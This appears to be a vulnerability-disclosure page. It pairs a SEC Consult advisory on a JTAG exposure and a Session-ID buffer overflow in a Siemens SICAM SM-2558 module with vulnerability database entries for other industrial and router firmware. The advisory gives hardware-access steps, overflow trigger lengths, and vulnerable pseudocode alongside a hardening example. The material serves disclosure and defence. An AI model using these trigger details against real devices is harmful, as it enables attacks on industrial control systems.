~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Stefan Viehboeck, Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knoebl / @2024
The hardware (SM-2558) is considered end of life (EOL), thus no new
version with a fixed JTAG will be released. Restrict physical access
to the device.
Vulnerability overview/description:
-----------------------------------
1) Unlocked JTAG Interface of Zynq-7000 on SM-2558
The JTAG interface can be accessed with physical access to the PCB.
After slightly modifying the hardware it is possible to connect to
the interface with full access to the communication module.
[...]
The target buffer is in the BSS segment and likely 1024 bytes in length. The buffer
overflows into several other global data structures.
Proof of concept:
-----------------
1) Unlocked JTAG Interface of Zynq-7000 on SM-2558
The JTAG interface pins (TDI, TDO, TCK, TMS, GND) are accessible on a populated
20-pin header on the PCB (see [figure_1]).
A removed connection needs to be restored by soldering an additional wire
between two exposed contacts (see [figure_2]), as the JTAG interface of the
Zynq-7000 is daisy-chained with the JTAG interface of the Broadcom BCM53101M
Ethernet controller. The pad in question connects to pin A57 (TDI) of the Ethernet
controller. After connecting to the pins, a connection to the Zynq-7000 JTAG
interface is possible. E.g., memory can be dumped ([figure_5]), execution can be
single stepped ([figure_4]) or halted ([figure_3]), and variables changed.
This grants an attacker with physical access full control of the communication
module.
[...]
(in total 618 characters) results in three HTTP responses
HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8
type=4
d) Session ID value 3814280BA992fd00000000000000... (in total 1260 characters) results in an HTTP 500 - Internal Server Error
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Content-Length: 198
<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>Sorry, an unexpected internal server error occurred while processing your request.</p></body></html>
Pseudocode of vulnerable function:
[...]
sessiond_id = (char *)get_http_header(a1, (int)"Session-ID"); <<<<<<<<<<<<<<<< session_id is extracted from HTTP request
if ( !sessiond_id )
    goto LABEL_194;
if ( unk_51CD1C )
{
    v11 = 0;
}
else
{
    sub_3DB0E4((unsigned int)byte_51CD08, (unsigned int)sessiond_id, 0x14u);
    v11 = 1;
}
if ( sub_15332C() == 1 )
{
    v134 = 0;
    if ( sub_155BC4(a1, (int)v133) || !v134 )
    {
LABEL_49:
        sequence_id = get_http_header_int(a1, "Sequence-ID");
        sprintf( <<<<<<<<<<<<<<<< response_buffer overflows here
            response_buffer,
            "HTTP/1.1 200 OK\r\n"
            "Server: %s\r\n"
            "Version: %u\r\n"
            "Session-ID: %s\r\n"
            "Sequence-ID: %lu\r\n"
            "Content-Type: text/plain\r\n"
            "Content-Length: 0\r\n"
            "\r\n",
            "SICAM 1703",
            1,
            sessiond_id,
            sequence_id);
[...]
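The two code findings above for CVE-2024-31484, the strncpy copy of "Session-ID" into a 20-byte global without a terminator (PoC item 1 of the first advisory) and the unbounded sprintf of the same header into a fixed response buffer (the pseudocode just shown), come from the same handler pattern. The following is an added illustration written for this page, not code from the advisory or from Siemens firmware: it models the 20-byte global next to another global in BSS, measures how far a "%s" of that global would read past it, and then shows the two checks a hardened handler needs (a terminated, length-checked copy and a length-checked snprintf). The struct layout, buffer sizes, the neighbouring "SECRET" value and all function names are constructed for the example.

```c
#define _POSIX_C_SOURCE 200809L   /* for strnlen */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define SESSION_ID_LEN 0x14       /* the length passed to strncpy in the advisory */
#define RESPONSE_BUF_SZ 256       /* hypothetical fixed-size response buffer */

/* Hypothetical BSS layout: the 20-byte session_id global is immediately
 * followed by another global, as the advisory describes. */
struct globals {
    char session_id[SESSION_ID_LEN];
    char next_global[16];
};
static struct globals g;

/* Vulnerable pattern: strncpy(dst, src, 20) with a 20-byte src writes no NUL. */
static void vulnerable_store(const char *hdr_value)
{
    strncpy(g.session_id, hdr_value, SESSION_ID_LEN);
}

/* How many bytes beyond session_id a "%s" of the global would emit, i.e. the
 * over-read seen in the Session-ID response header. The scan walks the whole
 * struct as a byte array, so it stays inside one object. */
int leaked_bytes_after_vulnerable_copy(void)
{
    memset(&g, 0, sizeof g);
    strcpy(g.next_global, "SECRET");              /* constructed neighbouring data */
    vulnerable_store("3814280BA9921c6cAAAA");     /* exactly 20 bytes, as in the PoC */
    const unsigned char *p = (const unsigned char *)&g;
    size_t n = 0;
    while (n < sizeof g && p[n] != '\0')
        n++;
    return (int)n - SESSION_ID_LEN;               /* 6: "SECRET" would be leaked */
}

/* Hardened copy: bounded length check plus an explicit terminator. */
int safe_store(char *dst, size_t dstsz, const char *hdr_value)
{
    size_t n = strnlen(hdr_value, dstsz);
    if (n >= dstsz)
        return -1;                                /* no room for the NUL: reject */
    memcpy(dst, hdr_value, n);
    dst[n] = '\0';
    return 0;
}

/* Convenience wrapper: a 21-byte local (20 + NUL) is the correct destination size. */
int safe_store_fits(const char *hdr_value)
{
    char sid[SESSION_ID_LEN + 1];
    return safe_store(sid, sizeof sid, hdr_value);
}

/* Hardened response builder replacing the unbounded sprintf: the header value is
 * length-checked before use and snprintf's return value is checked for
 * truncation. Returns the response length, or -1 when the request is rejected. */
int build_response(char *out, size_t outsz, const char *sid, unsigned long seq)
{
    if (strnlen(sid, SESSION_ID_LEN + 1) > SESSION_ID_LEN)
        return -1;                                /* over-long header rejected at parse time */
    int n = snprintf(out, outsz,
                     "HTTP/1.1 200 OK\r\n"
                     "Server: %s\r\n"
                     "Version: %u\r\n"
                     "Session-ID: %s\r\n"
                     "Sequence-ID: %lu\r\n"
                     "Content-Type: text/plain\r\n"
                     "Content-Length: 0\r\n"
                     "\r\n",
                     "SICAM 1703", 1u, sid, seq);
    if (n < 0 || (size_t)n >= outsz)
        return -1;                                /* would have overflowed response_buffer */
    return n;
}

int short_sid_response_length(void)
{
    char buf[RESPONSE_BUF_SZ];
    return build_response(buf, sizeof buf, "3814280BA9921c6cAAAA", 1);
}

int long_sid_rejected(void)
{
    char big[1261];                               /* the 1260-character value from the PoC */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    char buf[RESPONSE_BUF_SZ];
    return build_response(buf, sizeof buf, big, 1);
}

int main(void)
{
    printf("bytes over-read after vulnerable strncpy: %d\n", leaked_bytes_after_vulnerable_copy());
    printf("safe_store 20 bytes: %d, 21 bytes: %d\n",
           safe_store_fits("3814280BA9921c6cAAAA"), safe_store_fits("3814280BA9921c6cAAAAX"));
    printf("response length: %d, 1260-byte sid: %d\n",
           short_sid_response_length(), long_sid_rejected());
    return 0;
}
```

The defensive point is that the two bugs need two separate checks: giving the destination one extra byte and writing the NUL fixes the over-read, while rejecting over-long header values before formatting (and checking snprintf's return) is what turns the 1260-byte case from a crash into a clean error response.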
Vulnerable / tested versions:
-----------------------------
The following versions have been tested, which were the latest versions available
at the time of the test:
- Webserver that runs on Firmware Version 10A45 of the Zynq FPGA.
- The Hardware revision of the device was unknown.
2024-04-03: Siemens can reproduce vulnerabilities and will evaluate buffer overflow.
Hardware is EOL, no fix for the JTAG issue.
2024-06-11: Siemens publishes SSA-620338 and confirms the buffer overflow.
2024-07 - 2024-09: Various vacation / absences, delaying advisory coordination.
2024-10-22: Meeting with ProductCERT, discussing release of SM-2558 advisory.
2024-10-31: Sending advisory draft to ProductCERT.
2024-11-14: Receiving feedback on advisory draft.
2024-11-19: Sending updated advisory to ProductCERT.
2024-11-25: Coordinated release of advisory.
Solution:
---------
The vendor provides patches for the affected devices / components
to fix CVE-2024-31484:
* ETA4 for SM-2558: Upgrade to V10.46
* ETA5 for SM-2558: Upgrade to V03.27
* CPCX26 for CP-2016: Upgrade to V06.02
* PCCX26 for CP-2019: Upgrade to V06.05
More detailed information can be found in the Siemens Security Advisory SSA-620338:
https://cert-portal.siemens.com/productcert/html/ssa-620338.html
The hardware (SM-2558) is considered end of life (EOL), thus no new version
with a fixed JTAG will be released. Restrict physical access to the device.
| VAR-202405-0155 | CVE-2024-30209 | Siemens SIMATIC RTLS Locating Manager sensitive information plaintext transmission vulnerability |
CVSS V2: 8.3 CVSS V3: 9.6 Severity: CRITICAL |
A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). Affected systems transmit client-side resources without proper cryptographic protection. This could allow an attacker to eavesdrop on and modify resources in transit. A successful exploit requires an attacker to be in the network path between the RTLS Locating Manager server and a client (MitM). SIMATIC RTLS Locating Manager is used to configure, operate, and maintain SIMATIC RTLS devices, which are real-time wireless location systems that provide location solutions.
Siemens SIMATIC RTLS Locating Manager has a sensitive information plaintext transmission vulnerability
| VAR-202405-0160 | CVE-2024-30208 | Siemens SIMATIC RTLS Locating Manager Critical Resource Permission Assignment Improper Vulnerability |
CVSS V2: 4.3 CVSS V3: 6.3 Severity: MEDIUM |
A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). The "DBTest" tool of SIMATIC RTLS Locating Manager does not properly enforce access restriction. This could allow an authenticated local attacker to extract sensitive information from memory. SIMATIC RTLS Locating Manager is used to configure, operate and maintain SIMATIC RTLS devices, which is a real-time wireless positioning system that provides positioning solutions.
Siemens SIMATIC RTLS Locating Manager has a critical resource permission allocation incorrect vulnerability
| VAR-202405-0152 | CVE-2024-30207 | Siemens SIMATIC RTLS Locating Manager has an unspecified vulnerability (CNVD-2024-23114) |
CVSS V2: 10.0 CVSS V3: 10.0 Severity: CRITICAL |
A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). The affected systems use symmetric cryptography with a hard-coded key to protect the communication between client and server. This could allow an unauthenticated remote attacker to compromise confidentiality and integrity of the communication and, subsequently, availability of the system.
A successful exploit requires the attacker to gain knowledge of the hard-coded key and to be able to intercept the communication between client and server on the network. SIMATIC RTLS Locating Manager is used to configure, operate and maintain SIMATIC RTLS devices, which is a real-time wireless location system that provides location solutions
| VAR-202405-0162 | CVE-2024-30206 | Siemens SIMATIC RTLS Locating Manager has an unspecified vulnerability |
CVSS V2: 8.3 CVSS V3: 8.8 Severity: HIGH |
A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). Affected SIMATIC RTLS Locating Manager Clients do not properly check the integrity of update files. This could allow an unauthenticated remote attacker to alter update files in transit and trick an authorized user into installing malicious code.
A successful exploit requires the attacker to be able to modify the communication between server and client on the network. SIMATIC RTLS Locating Manager is used to configure, operate and maintain SIMATIC RTLS devices, which is a real-time wireless location system that provides location solutions
| VAR-202405-1031 | CVE-2024-1914 |
CVSS V2: - CVSS V3: 6.5 Severity: MEDIUM |
An attacker who successfully exploited these vulnerabilities could cause the robot to stop, make the robot controller inaccessible.
The vulnerability could potentially be exploited to perform unauthorized actions by an attacker. This vulnerability arises under specific condition when specially crafted message is processed by the system.
Below are reported vulnerabilities in the Robot Ware versions.
* IRC5- RobotWare 6 < 6.15.06 except 6.10.10, and 6.13.07
* OmniCore- RobotWare 7 < 7.14
| VAR-202405-1487 | CVE-2024-1913 | ABB of Robotware Out-of-bounds write vulnerability in |
CVSS V2: - CVSS V3: 7.6 Severity: HIGH |
An attacker who successfully exploited these vulnerabilities could cause the robot to stop, make the robot controller inaccessible, or execute arbitrary code.
The vulnerability could potentially be exploited to perform unauthorized actions by an attacker. This vulnerability arises under specific condition when specially crafted message is processed by the system.
Below are reported vulnerabilities in the Robot Ware versions.
* IRC5- RobotWare 6 < 6.15.06 except 6.10.10, and 6.13.07
* OmniCore- RobotWare 7 < 7.14
ABB RobotWare contains an out-of-bounds write vulnerability that may allow information disclosure, information tampering, and denial of service (DoS)
| VAR-202405-0210 | CVE-2023-46280 | Siemens Industrial Products Out-of-Bounds Read Vulnerability |
CVSS V2: 4.6 CVSS V3: 6.5 Severity: High |
A vulnerability has been identified in Security Configuration Tool (SCT) (All versions), SIMATIC Automation Tool (All versions < V5.0 SP2), SIMATIC BATCH V9.1 (All versions < V9.1 SP2 Upd5), SIMATIC NET PC Software V16 (All versions < V16 Update 8), SIMATIC NET PC Software V17 (All versions), SIMATIC NET PC Software V18 (All versions < V18 SP1), SIMATIC NET PC Software V19 (All versions < V19 Update 2), SIMATIC PCS 7 V9.1 (All versions < V9.1 SP2 UC05), SIMATIC PDM V9.2 (All versions < V9.2 SP2 Upd3), SIMATIC Route Control V9.1 (All versions < V9.1 SP2 Upd3), SIMATIC S7-PCT (All versions < V3.5 SP3 Update 6), SIMATIC STEP 7 V5 (All versions < V5.7 SP3), SIMATIC WinCC OA V3.17 (All versions), SIMATIC WinCC OA V3.18 (All versions < V3.18 P025), SIMATIC WinCC OA V3.19 (All versions < V3.19 P010), SIMATIC WinCC Runtime Advanced (All versions < V17 Update 8), SIMATIC WinCC Runtime Professional V16 (All versions < V16 Update 6), SIMATIC WinCC Runtime Professional V17 (All versions < V17 Update 8), SIMATIC WinCC Runtime Professional V18 (All versions < V18 Update 4), SIMATIC WinCC Runtime Professional V19 (All versions < V19 Update 2), SIMATIC WinCC V7.4 (All versions), SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 17), SIMATIC WinCC V8.0 (All versions < V8.0 Update 5), SINAMICS Startdrive (All versions < V19 SP1), SINEC NMS (All versions < V3.0), SINEC NMS (All versions < V3.0 SP1), SINUMERIK ONE virtual (All versions < V6.23), SINUMERIK PLC Programming Tool (All versions < V3.3.12), TIA Portal Cloud Connector (All versions < V2.0), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions < V17 Update 8), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 4), Totally Integrated Automation Portal (TIA Portal) V19 (All versions < V19 Update 2). 
The affected applications contain an out of bounds read vulnerability. This could allow an attacker to cause a Blue Screen of Death (BSOD) crash of the underlying Windows kernel. S7 PCT (Port Configuration Tool) is a PC-based software for parameterizing Siemens IO-Link master modules and third-party IO-Link devices. Security Configuration Tool (SCT) is an engineering software for safety devices such as SCALANCE-S or CP 443-1Advanced. SIMATIC Automation Tool allows commissioning, adjustment and service in combination with S7-1200 and S7-1500 controllers without an engineering framework. SIMATIC NET PC software is a separately sold software product for implementing communication products for SIMATIC.NET. SIMATIC PCS 7 is a distributed control system (DCS) that integrates SIMATIC WinCC, SIMATIC Batch, SIMATIC Route control, OpenPCS 7 and other components. SIMATIC PDM (Process Device Manager) is a universal, manufacturer-independent tool for configuration, parameter assignment, commissioning, diagnostics and maintenance of intelligent process devices (actuators, sensors) and automation components (remote I/O, multiplexers, process control units, compact controllers). SIMATIC STEP 7 V5 is the classic engineering software for configuring and programming SIMATIC S7-300/S7-400/C7/WinAC controllers. SIMATIC WinCC is a Supervisory Control and Data Acquisition (SCADA) system. SIMATIC WinCC Open Architecture (OA) is part of the SIMATIC HMI family. It is designed for applications that require a high degree of customer-specific adaptability, large or complex applications, and projects that impose specific system requirements or functions. SIMATIC WinCC Runtime Advanced is a visualization runtime platform for operator control and monitoring of machines and plants. SIMATIC WinCC Runtime Professional is a visualization runtime platform for operator control and monitoring of machines and plants. 
SIMATIC WinCC Unified PC Runtime is a new visualization runtime platform for operator control and monitoring of machines and plants. SINAMICS Startdrive commissioning software is the engineering tool for integrating SINAMICS drives in the TIA Portal. SINUMERIK CNC provides automation solutions for workshops, shop floors and large serial production environments. SINUMERIK ONE is a digital native CNC system. Totally Integrated Automation Portal (TIA Portal) is a PC software that provides the complete range of Siemens digital automation services, from digital planning and integrated engineering to transparent operation. TIA Portal Cloud Connector enables access to local PG/PC interfaces and connected SIMATIC hardware from TIA Portal Engineering when engineering via remote desktop on a private cloud server
| VAR-202405-1668 | CVE-2024-4699 | D-Link Systems, Inc. of dar-8000-10 Untrusted Data Deserialization Vulnerability in Firmware |
CVSS V2: 6.5 CVSS V3: 6.3 Severity: Medium |
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230922. This issue affects some unknown processing of the file /importhtml.php. The manipulation of the argument sql leads to deserialization. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-263747. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. The firmware of the D-Link Systems, Inc. DAR-8000-10 contains an untrusted data deserialization vulnerability that may allow information disclosure, information tampering, and denial of service (DoS). DAR-8000-10 is an Internet behavior audit gateway of D-Link Corporation of China.
DAR-8000-10 20230922 and earlier versions of D-Link Electronics (Shanghai) Co., Ltd. have a deserialization vulnerability. The vulnerability stems from the unsafe deserialization processing of the parameter sql of the file /importhtml.php when receiving the serialized data submitted by the user. Attackers can exploit this vulnerability to cause code execution
| VAR-202405-4083 | CVE-2024-35099 | TOTOLINK of lr350 Classic buffer overflow vulnerability in firmware |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
TOTOLINK LR350 V9.3.5u.6698_B20230810 was discovered to contain a stack overflow via the password parameter in the function loginAuth. The TOTOLINK LR350 firmware contains a classic buffer overflow vulnerability that may allow information disclosure, information tampering, and denial of service (DoS). The TOTOLINK LR350 is a 4G LTE router released by China's TOTOLINK Electronics. It converts 4G signals into wired signals and is suitable for home and office use.
The TOTOLINK LR350 suffers from a buffer overflow vulnerability. This vulnerability stems from the failure to properly validate the length of the input data in the password parameter of the loginAuth function. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service
| VAR-202405-3988 | CVE-2024-34974 | Shenzhen Tenda Technology Co.,Ltd. of AC18 Out-of-bounds read vulnerability in firmware |
CVSS V2: 8.5 CVSS V3: 8.2 Severity: HIGH |
Tenda AC18 v15.03.05.19 is vulnerable to Buffer Overflow in the formSetPPTPServer function via the endIp parameter. The firmware of the Shenzhen Tenda Technology Co.,Ltd. AC18 contains an out-of-bounds read vulnerability that may allow information tampering and denial of service (DoS). The vulnerability is caused by the endIp parameter in the formSetPPTPServer function failing to correctly verify the length of the input data. Attackers can exploit this vulnerability to cause a denial of service
| VAR-202405-4019 | CVE-2024-34946 | Shenzhen Tenda Technology Co.,Ltd. of fh1206 Stack-based buffer overflow vulnerability in firmware |
CVSS V2: 7.8 CVSS V3: 6.5 Severity: MEDIUM |
Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the page parameter at ip/goform/DhcpListClient. Shenzhen Tenda Technology Co.,Ltd. Attackers can exploit this vulnerability to cause a denial of service
| VAR-202405-4015 | CVE-2024-34945 | Shenzhen Tenda Technology Co.,Ltd. of fh1206 Classic buffer overflow vulnerability in firmware |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the PPW parameter at ip/goform/WizardHandle. The firmware of the Shenzhen Tenda Technology Co.,Ltd. FH1206 contains a classic buffer overflow vulnerability that may allow information disclosure, information tampering, and denial of service (DoS). The vulnerability is caused by the PPW parameter of ip/goform/WizardHandle failing to correctly verify the length of the input data. Attackers can exploit this vulnerability to execute arbitrary code on the system or cause a denial of service